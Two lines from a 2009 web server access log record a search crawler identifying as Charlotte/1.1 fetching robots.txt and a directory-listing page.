208.111.154.16 - - [31/Mar/2009:06:51:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [31/Mar/2009:06:51:54 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
